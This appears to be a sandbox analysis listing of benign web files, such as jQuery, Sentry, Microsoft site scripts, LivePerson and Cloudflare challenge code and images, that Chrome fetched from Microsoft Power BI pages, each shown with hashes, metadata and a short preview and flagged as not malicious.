                                                                                                                                                              Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):103505
                                                                                                                                                              Entropy (8bit):7.997311770515596
                                                                                                                                                              Encrypted:true
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:5C88017E5A000423DD4DF225AEDA6939
                                                                                                                                                              SHA1:5D94A1FF71B92DB1EAE0912409F4C1B153ABFEF8
                                                                                                                                                              SHA-256:6EAFAFEA31586E6DF130E85676770F04B51A389CAD96F5B6B45C050AD0993B70
                                                                                                                                                              SHA-512:241E1887A6E87E8C30508CC957BFC6165E3C6ED5F04E26E271581E066E5AEE1FED105FC998ED80AE716E831040C093F468F0C72E37C23A883A7691B271F62591
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              URL:"https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/ProductOverview_CopilotinPBI_3.1?resMode=sharp2&op_usm=1.5,0.65,15,0&wid=2000&qlt=96&fmt=png-alpha&fit=constrain"
                                                                                                                                                              Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm.........,iloc....D................:.............N...Biinf..........infe........av01Color.....infe........av01Alpha.....iref........auxl..........iprp....ipco....ispe...........&....pixi............av1C........colrnclx...........ispe...........&....pixi..........av1C.......8auxC....urn:mpeg:mpegB:cicp:systems:auxiliary:alpha.....ipma..........................mdat.....*..%.P2...@..@......k...z.%..i..+Ft\+.r....^((.D...].t....M...<..3..N@a..S...Y`~.......3n.....W.4.3U.Q ...hJ1..f..=.......&#..d..Vf...[...f`%.sz}..87...vt....QA...Z..I&...D.......g...=N...@....)...s......T_.........~.H...&.%\e.2.U....t.V.0....n.g#..ip.r..9.J..{...N.TU....P`..k.....X.......k.C.W....(...sf...-........*..%..B2....@........EI....=.p...qb..........*...B....\.`[e}4C..1...k...F.(...g......-2.......1.bVBH05.W.x....+..u..o.;0.N..wD.".p.\..o9..l.........h.K.;./.8y....t#......O....c...G..z`$..v.
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:exported SGML document, ASCII text, with very long lines (366)
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):1904
                                                                                                                                                              Entropy (8bit):4.802036868832552
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:305E80CB22D0F14E474C408C181CB792
                                                                                                                                                              SHA1:8B946E3AD049A39E3BBC925B1D40BBE2F2A7E2B6
                                                                                                                                                              SHA-256:A8FB92359BE5D0FB839DED898756E674A74C9A52DA8340431C2CF24B05AA43C5
                                                                                                                                                              SHA-512:4F398BC8323454C5213EF37A5425A7FB114CE251A8C63C5112001DE1879EA23BBBD8A0C96DA78B7F189C659D63AFE273D90833DB464AEDBA98F6F32EF98BE8D9
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              URL:https://www.microsoft.com/etc.clientlibs/onecloud/clientlibs/clientlib-product-pricing-templates/sku.min.ACSHASH305e80cb22d0f14e474c408c181cb792.js
                                                                                                                                                              Preview:'use strict';function getSkuMarkup(a,c){let b=a.discountedTextTemplate;a.isDiscounted&&b&&(b=b.replace(window.ocReimagine.ProductPriceModule.ProductPricingConstants.Parameters.ScreenReader.ListPriceKey,c.sku.displayListPrice),b=b.replace(window.ocReimagine.ProductPriceModule.ProductPricingConstants.Parameters.ScreenReader.MsrpKey,c.sku.displayMSRPPrice));const d=`. <div . class="sku__pricing-discount">. <span class="oc-displayMSRPPrice">${c.sku.displayMSRPPrice}</span>. </div>. `,e=`. <div class="sku__detail-recurrence">. <span class="oc-displayUnit">${a.displayUnitMap[c.productId]}. </span>. </div>. `;return`. <div class="sku__title" data-ocr-pricing-render="title">. <h3 class="oc-product-title">${a.renderTitle}</h3>. </div>. <div class="sku__paragraph" data-ocr-pricing-content="paragraph"></div>. ${a.isDiscounted?`. <p class="sr-only" data-ocr-pricing-render="sc
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):61
                                                                                                                                                              Entropy (8bit):3.990210155325004
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                                                                                                              SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                                                                                                              SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                                                                                                              SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/cmg/1
                                                                                                                                                              Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):190820
                                                                                                                                                              Entropy (8bit):7.9982196184883305
                                                                                                                                                              Encrypted:true
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:1F5F46733177ED55D854271B19D15089
                                                                                                                                                              SHA1:BD78E754178B140CAC201D65441D8FE942D44D1C
                                                                                                                                                              SHA-256:C0116943FD86FE2F60FB5327CA6916DFE2A75A4676F6B685B721C22B0E6FC7EF
                                                                                                                                                              SHA-512:0C754608BBDE5F3A53004C09A925C4287F6DA4D4020B99ADCB309D631E6DD35CA20A5F78D7AE4A153EB0A79D13C783893BB3B5810F72C4087761E48D5DD4CC05
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              Preview:RIFF\...WEBPVP8X...........%..ALPHg.....p....@.m3..O......................................................................................."..VP8 .........*..&.>.......t...8...g5."ysQ^l.k.X~6.....Y.....a...w'.'.Ob...{.H...."....o.m(......~..........?...m.1.../..".../^....._.o.....~..................5.Q........................z...u.7.../.?|..?........o......g.....;......._........../........l_.?..{.....;.#.G..._.?...~....[...m...g.............?u.....@...)...Q..._.w....._..........c....................../.?.............../............?9.................~..../.?......~....~=..........}..=........]_)....._s...&.7..._...........G.W.....~-.c...3.....?.....i...../v...!.@........._E....._.O.......R.....?V.........?...>......Q................7.7......)......._.......T....................o....d...#.....?........'.........?....w.......s...+...g.........y..ksC..T\C[..x.\^..8e_yo.^..Z.}.B...7c..Ur.'.$..9......_#I..{....?.0..*`9...G,.g.Ol(K.Q..z.HLC[......1.l./...$.g..-.
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ASCII text, with very long lines (55289)
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):55418
                                                                                                                                                              Entropy (8bit):5.2011745666689
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:16E5D529039D25735AE0BA1D610125E8
                                                                                                                                                              SHA1:D7CAA746424A018583EC1E097F74A484C4FB1811
                                                                                                                                                              SHA-256:C6DE703F8EE214808496DCD92795AC8971782935ED75ABDD5624C814E69DAAEA
                                                                                                                                                              SHA-512:56AC6CDABC05070E1440C8CA4A60119B3555B2743BA8652A2A0282701ECC8E150AC343020D620D3F5CD6406F04966CDE54FD797530149AD0B2711E44F89165D0
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              URL:https://static.canva.com/static/lib/sentry/7.16.0.min.js
                                                                                                                                                              Preview:/*! @sentry/browser 7.16.0 (5386ce7) | https://github.com/getsentry/sentry-javascript */.var Sentry=function(t){const n=Object.prototype.toString;function e(t){switch(n.call(t)){case"[object Error]":case"[object Exception]":case"[object DOMException]":return!0;default:return h(t,Error)}}function r(t,e){return n.call(t)===`[object ${e}]`}function i(t){return r(t,"ErrorEvent")}function s(t){return r(t,"DOMError")}function o(t){return r(t,"String")}function c(t){return null===t||"object"!=typeof t&&"function"!=typeof t}function u(t){return r(t,"Object")}function a(t){return"undefined"!=typeof Event&&h(t,Event)}function f(t){return Boolean(t&&t.then&&"function"==typeof t.then)}function h(t,n){try{return t instanceof n}catch(t){return!1}}function l(t){return t&&t.Math==Math?t:void 0}const d="object"==typeof globalThis&&l(globalThis)||"object"==typeof window&&l(window)||"object"==typeof self&&l(self)||"object"==typeof global&&l(global)||function(){return this}()||{};function p(t,n,e){const r
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):1208
                                                                                                                                                              Entropy (8bit):4.1454166409501
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:569BDE0B8438D4A965908256BADFA0D8
                                                                                                                                                              SHA1:EC9D5CBCFA84D5818C962CAEDEC3BF5239C82DB6
                                                                                                                                                              SHA-256:9D29D6F01A64A3C9FC438C71996562F0D0EC11384EE85D85CBA6595CF284771B
                                                                                                                                                              SHA-512:293E83E3DCA9B9EA2E88F083DF9DA73E4BCB48428D75D423784AA629C38BAA808057B647AF23599956295977EC5045EB0A3076834C5272EB0A27B4C4A152F0FB
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              Preview:<svg width="64" height="64" viewBox="0 0 64 64" fill="none" xmlns="http://www.w3.org/2000/svg">.<path d="M31.4142 4.58575C30.6331 3.80472 29.3668 3.80475 28.5858 4.58582C27.8047 5.36689 27.8048 6.63322 28.5858 7.41425L31.8389 10.6672C18.6582 10.7538 8 21.4656 8 34.6667C8 47.9215 18.7452 58.6667 32 58.6667C44.5178 58.6667 54.7954 49.0847 55.9015 36.8539C56.001 35.7538 55.1899 34.7814 54.0898 34.6819C52.9897 34.5824 52.0173 35.3935 51.9178 36.4936C50.9964 46.6821 42.4295 54.6667 32 54.6667C20.9543 54.6667 12 45.7124 12 34.6667C12 23.6753 20.8665 14.7547 31.8373 14.6673L28.5858 17.9188C27.8047 18.6998 27.8047 19.9662 28.5858 20.7472C29.3668 21.5283 30.6332 21.5283 31.4142 20.7472L38.0809 14.0806C38.456 13.7055 38.6667 13.1968 38.6667 12.6663C38.6667 12.1359 38.4559 11.6272 38.0808 11.2521L31.4142 4.58575ZM42.0898 27.2524C42.8709 28.0335 42.8709 29.2998 42.0899 30.0809L30.0809 42.0901C29.7058 42.4651 29.1971 42.6759 28.6667 42.6759C28.1362 42.6759 27.6275 42.4652 27.2525 42.0901L21.9191 36
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 2000x930, Suserng: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):18604
                                                                                                                                                              Entropy (8bit):7.990135849132951
                                                                                                                                                              Encrypted:true
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:21BCC4279E8A443322B6BBBB647C9737
                                                                                                                                                              SHA1:A5B5A0D621766F730DCFCFA45349F9D0E592AD25
                                                                                                                                                              SHA-256:BAA234E9220B0B237F6A2D2FCA548D743C15B410969FA9B76B6B5445DAA64DC8
                                                                                                                                                              SHA-512:0A89ABC05851A4C14F3437FA765DFB5EA6A62571E689AEA5209C5A354DCD688CF35F4AE8620648262351D0F8480BB40B3B5CC482AD7CCBFDE6A5EBA25262B473
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              Preview:RIFF.H..WEBPVP8 .H......*....>.............s..........,j......Y..?.....h............m/....O..o?..~z........g.........J.}...h........Xr.'.\..<J.|T..X.u.....a.\...?p...nU.......J...'n..k4TPxE&..e.v|4...DxRx.]..?.y-..dL.&~...K.GW.O......!..BI.ui...n.d.R..eu.cv......'..E..q.[.[.;..'.....k9...?~..E.[-..m..G..{!Z.... \.;..i.%.|46.(.m...-h.E0.2..!.B...K.Y..b{.b.@.D}.+&...:.a.hAG..^3q1.)...u?..-.:.$.~.!YB...5[sp...}Wh....#....r..Z.,.4..".e.o.e.......Oqi.;......K..8..=.qd.AH.n.v..............}.<.#..B.......Wk9....^.g*,BC*..v.....vw.L".v...}.(. R.mX...#.E.M...C\...V>.@(+...[.;.qd.....P........#.......N..y..>..J..}=.....4 .8.OK.........=..R3.".t>...v1IR.......Un.)3......$.B..B).Y,..o.$/n...M..J\......&c.q.?Q...a...\T..>..h.w..q....T.h.p......(.A:<P..JO"..........R]..o.w...`..+.|..(0o'.... .S..h..!pS..w.3.V~.`...0.o.m.....L.)..V.g..'0..]..B..V.}..Z....\#.2...=.a.S...p...=Sk.... . ..&.u..H+...&2..x......l......>.-.A.....8Z..j...{.K......I
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (32197)
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):48665
                                                                                                                                                              Entropy (8bit):5.397492809727543
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:6CAB0DE42E6BC92FAEDC367FF28099C4
                                                                                                                                                              SHA1:A7849EBEB1CE1C7384AE6576D03A80F285802854
                                                                                                                                                              SHA-256:ECBD8C69A4D0B69033B1E2BC7F50CE507F2843CE18F345F19DE1D5ECE5FE161E
                                                                                                                                                              SHA-512:7EC29242FFAA3FBD47E9D7EC946DA6641A8B2F14A6429BB0BDFC701761BA1E94FF9F2BF65F7B695CBF04E0751F428D670CF25053E1B6828EC160AFC02F4E6C4D
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              URL:https://lpcdn.lpsnmedia.net/le_secure_storage/3.31.1-release_1465379762/storage.secure.min.html?loc=https%3A%2F%2Fpublisher.liveperson.net&site=60270350&env=prod&isCrossDomain=true&accdn=accdn.lpsnmedia.net
                                                                                                                                                              Preview:<!DOCTYPE html><html xmlns="http://www.w3.org/1999/xhtml" lang="en"><meta http-equiv="X-UA-Compatible" content="IE=100"><script type="text/javascript">window.lpTag=window.lpTag||{},window.lpTag.lzString=window.lpTag.lzString||function(){function e(e,t){if(!o[e]){o[e]={};for(var n=0;n<e.length;n++)o[e][e.charAt(n)]=n}return o[e][t]}var t=String.fromCharCode,n="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",r="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+-$",o={},a={compressToBase64:function(e){if(null==e)return"";var t=a._compress(e,6,function(e){return n.charAt(e)});switch(t.length%4){default:case 0:return t;case 1:return t+"===";case 2:return t+"==";case 3:return t+"="}},decompressFromBase64:function(t){return null==t?"":""==t?null:a._decompress(t.length,32,function(r){return e(n,t.charAt(r))})},compressToUTF16:function(e){return null==e?"":a._compress(e,15,function(e){return t(e+32)})+" "},decompressFromUTF16:function(e){return null==e?"":""==e?n
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ASCII text
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):9316
                                                                                                                                                              Entropy (8bit):4.267140948442776
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:2B143BED0FF34BC70BC0703346F70E08
                                                                                                                                                              SHA1:7FB14A8842293FD041C7C138285AC2F822AC4B4C
                                                                                                                                                              SHA-256:C35BBDEE4A46BFBF552989E1126E1F09B454EB3DC2523376C38964BF6128BE86
                                                                                                                                                              SHA-512:46BBF881243EC3C27046FCB66F9D8412B459CC7B6DA1ABF0DCB5F70D578F57E9A88D52431753B65F851892055AC17EDD9446E11BA67D7B0DA80B2B2615F67688
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              URL:https://www.microsoft.com/etc.clientlibs/cascade.component.authoring/clientlibs/clientlib-reimagine-base.min.ACSHASH2b143bed0ff34bc70bc0703346f70e08.js
                                                                                                                                                              Preview:// This function replaces popover data-island tags insertd in RTE via the popover plugin.(function () {. if (!window || !window.ocrReimagine) {. return;. }.. window.ocrReimagine.PopoverRichTextPlugin = new class {. popoverRichTextMountSelector = '.popover-rte-mount';. popoverMountSelector = '[data-mount="popover"]';.. isPopoverComponentEnabled() {. return !!(window.mwf?.Popover);. }.. isIconComponentEnabled() {. return !!(window.ocrReimagine?.Icon?.getInstances());. }.. /**. * Initialize popover elements with the class 'popover-rte-mount' by looking up inside the target element or entire document.. */. initializePopoverRichTextPlugin() {. if (!this.isPopoverComponentEnabled()) {. return;. }.. // Get all popover rich text elements.. const popoverRichTextElements = this.getPopoverRichTextElements();.. if (!popo
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (6824)
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):404817
                                                                                                                                                              Entropy (8bit):5.158577025288771
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:11246AE000B7BCC88B87346A1FB1CB0B
                                                                                                                                                              SHA1:76F7BB5D38709BAF38574B4CD07B20C9C90950D5
                                                                                                                                                              SHA-256:081C063FA8A1FD50BDF402FD24F2AD42833FBC50F601F36542D5FB36DA23A39B
                                                                                                                                                              SHA-512:F1E01749CABE4A41C09019101C3CCEE1F1E3013902CA8296E13760331B4333F0D2D9E37BAAEC7DAA108106624F10DC45A3ABF7D7E8045062DDDB65BF674A3213
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              URL:https://www.microsoft.com/en-us/power-platform/products/power-bi/
                                                                                                                                                              Preview:<!DOCTYPE HTML> <html lang="en-US" dir="ltr"> <head> <meta charset="UTF-8"/> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"/> <meta http-equiv="x-ua-compatible" content="ie=edge"/> <link rel="SHORTCUT ICON" href="/favicon.ico?v2" type="image/x-icon"/> <meta name="robots" content="index, follow"/> <meta name="template" content="reimagine---product-detail-3"/> <meta name="awa-canvasType" content="web"/> <meta name="awa-isTented" content="false"/> <meta name="awa-pgtmp" content="reimagine---product-detail-3"/> <meta name="awa-pageType" content="Microsoft Power Platform"/> <meta name="awa-market" content="en-us"/> <meta name="awa-cms" content="AEM"/> <meta name="awa-enabledFeatures" content="contentbackfillgenerate;esiproductcards;feature-controlled-mwf;uhf-ms-io-endpoint;uhf-esi-cv;uhf-esi-cache;fraud-greenid;contentsquare;mediapixel;holiday-themer;lazyload-static-components;clientlibDefer;upsellEnabled;contentbackfillpkgdelete;healthcheck;co
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ASCII text, with very long lines (4435), with no line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):4435
                                                                                                                                                              Entropy (8bit):5.012314355171982
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:303F5531870B1AE467D4C68F05D6B278
                                                                                                                                                              SHA1:68066BF1BF00EB47106B4C5DAC810441090AF485
                                                                                                                                                              SHA-256:424C38CC078E306A93D5997EDB09B9DE025552892E45E230731958345CD49589
                                                                                                                                                              SHA-512:A2B7EA9AEBF62ECF498ECDB5620BFBD9BCEA576B5956BDCB894CBA80EACE542E3A45148EDE501A44755636F7BC2B10D506A5895C9DA238D8DEA3E9478BEE0C29
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              Preview:lpCb26840x49685({"id":1832741830,"name":"Power Platform Messaging English","description":"","json":{"logoAltText":"","scheme":{},"surveyAgentChatEnabled":false,"customVars":{},"postChatSurveyOnNonInteractiveChat":false,"sound":true,"smsPreFormId":"","surveyPreChatId":"315072652d636861742073757276657931343838333235343639353239","surveyPostChatEnabled":false,"language":"en-US","sendIconType":"arrow","widgets":false,"attachmentIcon":true,"clearHistory":true,"surveyOfflineId":"344f66666c696e652073757276657931343838333235343639323732","floatingWindow":false,"id":-1,"agentImage":false,"logoRedirectUrl":"","email":true,"agentAvatar":"true","surveyPreChatEnabled":false,"customStyle":{"v":"2.0","meta":{"fonts":{"1":"Arial,Helvetica,sans-serif"},"colors":{"11":"#f2f2f2","1":"#0363ad","2":"#000000","3":"#FFFFFF","4":"#b6b6b6","5":"#6D6E70","6":"#50e6ff","7":"#D2D2D2","8":"#243a5e","9":"#ffffff","10":"#6e6e6e"}},"config":{"transcript_bubble_agent_text":{"attrs":{"style":{"color":"{{colors.2}}","fo
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (1999)
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):419611
                                                                                                                                                              Entropy (8bit):4.980054379765907
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:3CB55A1B7E29CABDED7D23377524B55E
                                                                                                                                                              SHA1:5731994750E31D9CD11085570630EAC99DC65845
                                                                                                                                                              SHA-256:0953ECFC1629CBBB80658EEC92D00BA89058F6862E5CD742A419412207088D3C
                                                                                                                                                              SHA-512:646E5BDE377A885E321790BDF16E07324754C5670B707F1BE4BC11208E2F2E2644189CECE32BFB9C86D51C503F37053D54E1CCC627ECA92D29A20EF2955A69FB
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              URL:https://www.microsoft.com/etc.clientlibs/onecloud/clientlibs/clientlib-mwf-new/main-light.min.ACSHASH3cb55a1b7e29cabded7d23377524b55e.js
                                                                                                                                                              Preview:./*!. * MWF (Moray) v2.8.1. * Copyright (c) Microsoft Corporation. All rights reserved.. * Copyright 2011-2022 The Bootstrap Authors and Twitter, Inc.. * Copyright .2022 W3C. (MIT, ERCIM, Keio, Beihang).. */..(function (global, factory) {. typeof exports === 'object' && typeof module !== 'undefined' ? factory(exports) :. typeof define === 'function' && define.amd ? define(['exports'], factory) :. (global = typeof globalThis !== 'undefined' ? globalThis : global || self, factory(global.mwf = {}));.})(this, (function (exports) { 'use strict';.. const ViewPort = {. XS: 0,. SM: 540,. MD: 860,. LG: 1084,. XL: 1400. };. const DetectionUtil = {. /* eslint-disable no-useless-escape, unicorn/better-regex */. detectMobile(includeTabletCheck) {. if (includeTabletCheck === void 0) {. includeTabletCheck = false;. }.. /**. * detect if mobile and/or tablet device. * returns bool. */. let check = false;.. if (includeTabletC
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ASCII text, with very long lines (8739), with no line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):8739
                                                                                                                                                              Entropy (8bit):5.738518695442799
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:04284AA12E3381BCBAE171F4AD41C2CF
                                                                                                                                                              SHA1:B2E0DE3B533ECC0A1F655BEDB5E3C9BCEAF5CB53
                                                                                                                                                              SHA-256:680873EC92F0102F2D6D063C95EF03B15B968ED801B4A20A34E146A46B1CC78B
                                                                                                                                                              SHA-512:C16D0FFBC248E4ACFAD4CFC09E1B5FE513C52616DAC244009ED96B26F5CEE3D5F065280F1BFA0781CBDC567F2D57F131CDE906D7C191B90ED09B341E617240DD
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              Preview:window._cf_chl_opt={cFPWv:'g'};~function(W,h,i,n,o,s,z,A){W=b,function(c,d,V,e,f){for(V=b,e=c();!![];)try{if(f=parseInt(V(429))/1+parseInt(V(545))/2*(parseInt(V(513))/3)+parseInt(V(486))/4*(-parseInt(V(528))/5)+parseInt(V(493))/6*(parseInt(V(512))/7)+-parseInt(V(445))/8+parseInt(V(481))/9+-parseInt(V(437))/10,f===d)break;else e.push(e.shift())}catch(E){e.push(e.shift())}}(a,315976),h=this||self,i=h[W(446)],n=function(a4,d,e,f){return a4=W,d=String[a4(484)],e={'h':function(E){return null==E?'':e.g(E,6,function(F,a5){return a5=b,a5(534)[a5(522)](F)})},'g':function(E,F,G,a6,H,I,J,K,L,M,N,O,P,Q,R,S,T,U){if(a6=a4,null==E)return'';for(I={},J={},K='',L=2,M=3,N=2,O=[],P=0,Q=0,R=0;R<E[a6(519)];R+=1)if(S=E[a6(522)](R),Object[a6(458)][a6(476)][a6(524)](I,S)||(I[S]=M++,J[S]=!0),T=K+S,Object[a6(458)][a6(476)][a6(524)](I,T))K=T;else{if(Object[a6(458)][a6(476)][a6(524)](J,K)){if(256>K[a6(543)](0)){for(H=0;H<N;P<<=1,F-1==Q?(Q=0,O[a6(546)](G(P)),P=0):Q++,H++);for(U=K[a6(543)](0),H=0;8>H;P=1&U|P<<1,F-1=
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ASCII text, with very long lines (17477), with no line terminators
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):17477
                                                                                                                                                              Entropy (8bit):5.3329406654784774
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:5C5964FF272C4685EC6C283AB9FF4FAE
                                                                                                                                                              SHA1:DBD20BBE60E599C9E739E3C209FDE0D2B6CB34EE
                                                                                                                                                              SHA-256:E588A55579DC39CA6FD803A67716C08ECD12D45EA14B760BD820CDF5B7EB8326
                                                                                                                                                              SHA-512:BA14B05AF884270FEB041CC80F0AA8F643BF3A58386ABFDA889F8E34E5DAFA5045FE2631089EDB2181B03604D643E88F07BB4C31CA44615B21E0BAE35798FAE5
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              URL:https://www.microsoft.com/library/svy/broker.js
                                                                                                                                                              Preview:if(void 0===COMSCORE)var COMSCORE={};void 0===COMSCORE.SiteRecruit&&(COMSCORE.SiteRecruit={sv:"scor",testUrl:"broker-test.js",configUrl:"broker-config.js",builderUrl:"builder.js",CONSTANTS:{STATE_NAME:{IDLE:"IDLE",DDINPROGRESS:"DDINPROGRESS"}}},COMSCORE.SiteRecruit.Utils=function(){var r=COMSCORE.SiteRecruit;return{location:document.location.toString(),referrer:document.referrer.toString(),loadScript:function(e,t){t&&!r.allowScriptCaching&&(e=r.Utils.appendQueryParams(e,(new Date).getTime()));var i=document.createElement("script");i.src=e,document.body.appendChild(i)},cleanURL:function(e){var t=e.split("?");if(1<t.length){var r="?";if(/([^.@\s]+)(\.[^.@\s]+)*@([^.@\s]+\.)+([^.@\s]+)|%40/i.test(t[1])){var o=t[1].split("&");for(i=0;i<o.length;i++)/([^.@\s]+)(\.[^.@\s]+)*@([^.@\s]+\.)+([^.@\s]+)|%40/i.test(o[i])||(r+=0==i?o[i]:"&"+o[i]);e=1<r.length?t[0]+r:t[0]}}return e},getDevice:function(e,t){var i=new RegExp(e,"i"),r=navigator.userAgent,o=new RegExp(t,"i"),n=self.screen.availWidth,a={
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 1920x1080, Suserng: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):177824
                                                                                                                                                              Entropy (8bit):7.9983932127513535
                                                                                                                                                              Encrypted:true
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:47FB7C68EDC93FDF1EF45C1720896030
                                                                                                                                                              SHA1:9FC05F3F0399705682775A59647A979B3953E38A
                                                                                                                                                              SHA-256:7215E762E2E775A16C58B79693E05A698E1A8AC5F2DB79BBAFCBE6729308209F
                                                                                                                                                              SHA-512:CE773F281B745C7BACA2B9B9C1697DE7C3872E7CB1B23BC197362E90B1E213AFB89AF060EAA56BFF568D59F740685B6A02C15967B2CF9F44D4AA2E720C1845FF
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
